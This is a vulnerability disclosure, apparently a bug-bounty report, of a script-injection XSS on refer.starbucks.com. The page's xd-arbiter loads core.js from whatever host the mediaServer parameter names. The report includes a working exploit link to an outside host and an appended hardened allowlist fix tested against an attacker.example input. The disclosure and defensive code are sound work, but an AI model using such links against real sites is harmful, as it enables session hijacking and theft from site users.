Reflective XSS in refer.starbucks.com

I have found a reflective XSS vulnerability on http://refer.starbucks.com. Below are the details:

  1. Go to http://happymondays.starbucks.com, scroll down and click the "Invite a friend" button. You will be redirected to http://refer.starbucks.com/micro/microsite?source=redirect
  2. On http://refer.starbucks.com/micro/microsite?source=redirect there are three buttons to "Spread the love":

SHARE WITH EMAIL

SHARE ON FACEBOOK

SHARE ON TWITTER

Clicking on each of them generates a request like this:

GET /xd-arbiter?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4 HTTP/1.1

Host: refer.starbucks.com

The use of an external server should immediately catch your attention; a quick look into the source code reveals a reflective XSS vulnerability:

var MEDIA_SERVER = queryArgs.mediaServer;
var CLIENT_ID = queryArgs.clientId;
var SOCKET_ID = queryArgs.socketId;
(…)
insertScript(MEDIA_SERVER + '/' + CLIENT_ID + '/core.js');

So we control MEDIA_SERVER ("https://lubi.cz"), CLIENT_ID (the "starbucks" folder) and SOCKET_ID (whatever), and the script that gets loaded is the combined core.js file ("https://lubi.cz/starbucks/core.js"). To execute a payload, just visit the following link:

http://refer.starbucks.com/xd-arbiter?mediaServer=https://lubi.cz&clientId=starbucks&socketId=1
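As an added example (not code from the original post or from the site's arbiter), here is the page's URL-building pattern beside a hardened version that parses mediaServer with the URL API and compares its origin against an allowlist; the allowlist contents, the https requirement and the digits-only clientId rule are assumptions.

```javascript
// Added example, not the page's or the site's own code.
// Assumption: queryArgs is a plain object of already-parsed query parameters.

// Assumed allowlist: the only media-server origin the arbiter should load from.
// tags.extole.com is the host seen in the legitimate request; requiring https is an assumption.
const ALLOWED_MEDIA_ORIGINS = new Set(["https://tags.extole.com"]);

// Vulnerable pattern, as in the page's snippet: untrusted query args are concatenated
// straight into a script URL, so mediaServer decides which server's core.js runs.
function buildScriptUrlVulnerable(queryArgs) {
  return queryArgs.mediaServer + "/" + queryArgs.clientId + "/core.js";
}

// Hardened: parse mediaServer with the URL API (a startsWith check is not enough, because
// "https://tags.extole.com@evil.example" and "https://tags.extole.com.evil.example" both
// begin with the trusted string), then compare the parsed origin against the allowlist.
// clientId is restricted to digits (assumed from the numeric value in the real request)
// so it cannot inject extra path segments or a query string. Returns null when rejected.
function buildScriptUrlSafe(queryArgs) {
  let origin;
  try {
    const parsed = new URL(String(queryArgs.mediaServer));
    if (parsed.protocol !== "https:") return null;
    origin = parsed.origin;
  } catch (_e) {
    return null; // not a parseable absolute URL
  }
  if (!ALLOWED_MEDIA_ORIGINS.has(origin)) return null;
  const clientId = String(queryArgs.clientId);
  if (!/^[0-9]{1,12}$/.test(clientId)) return null;
  return origin + "/" + clientId + "/core.js";
}

// Constructed requests: the legitimate one from the page and an attacker-shaped variant.
const LEGIT = { mediaServer: "https://tags.extole.com", clientId: "106223", socketId: "facebook_4" };
const HOSTILE = { mediaServer: "https://attacker.example", clientId: "starbucks", socketId: "1" };

console.log(buildScriptUrlVulnerable(HOSTILE)); // https://attacker.example/starbucks/core.js
console.log(buildScriptUrlSafe(HOSTILE));       // null
console.log(buildScriptUrlSafe(LEGIT));         // https://tags.extole.com/106223/core.js
```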

